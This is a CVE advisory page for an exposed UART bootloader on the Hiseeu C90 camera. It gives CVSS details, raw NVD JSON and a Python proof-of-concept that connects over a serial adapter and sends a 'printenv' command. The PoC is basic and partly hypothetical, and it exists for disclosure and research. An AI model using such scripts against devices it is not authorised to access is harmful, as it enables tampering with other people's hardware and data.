Security Vulnerability Report
中文
CVE-2026-36742 CVSS 6.8 MEDIUM

CVE-2026-36742

Published: 2026-05-13 16:16:41
Last Modified: 2026-05-14 13:16:18

Description

Hiseeu C90 v5.7.15 is vulnerable to Insecure Permissions. The UART bootloader is accessible when battery is disconnected (hidden/debug mode).

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Hiseeu C90 v5.7.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ PoC for CVE-2026-36742 (Hiseeu C90 Insecure Permissions) This script simulates interaction with the exposed UART bootloader. Requirements: pyserial, physical access via TTL-USB adapter. """ import serial import time # Configuration for the UART interface SERIAL_PORT = '/dev/ttyUSB0' # May vary on Windows (e.g., COM3) BAUD_RATE = 115200 def exploit_uart_bootloader(): print(f"[*] Attempting to connect to {SERIAL_PORT} at {BAUD_RATE} baud...") try: # Initialize serial connection ser = serial.Serial(SERIAL_PORT, BAUD_RATE, timeout=2) if ser.is_open: print("[+] Connection established. Device is in Debug Mode.") # Wait for bootloader prompt time.sleep(2) # Send a newline to trigger prompt ser.write(b'\r\n') time.sleep(1) # Read initial response response = ser.read_all() print(f"[+] Bootloader Response:\n{response.decode('utf-8', errors='ignore')}") # Example: Sending a command to list memory regions (hypothetical) # In a real scenario, commands might allow dumping firmware or unlocking the shell exploit_cmd = b'printenv\n' ser.write(exploit_cmd) time.sleep(1) # Read exploit response response = ser.read_all() print(f"[+] Exploit Output:\n{response.decode('utf-8', errors='ignore')}") ser.close() print("[*] PoC execution finished.") except serial.SerialException as e: print(f"[-] Serial connection failed: {e}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == '__main__': exploit_uart_bootloader()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-36742", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:16:40.977", "lastModified": "2026-05-14T13:16:17.527", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hiseeu C90 v5.7.15 is vulnerable to Insecure Permissions. The UART bootloader is accessible when battery is disconnected (hidden/debug mode)."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}], "references": [{"url": "https://github.com/N0tMilk/vulnerability-research", "source": "[email protected]"}, {"url": "https://github.com/N0tMilk/vulnerability-research/tree/main/IoT/CVE-2026-36742", "source": "[email protected]"}, {"url": "https://github.com/N0tMilk/vulnerability-research/tree/main/IoT/CVE-2026-36742", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}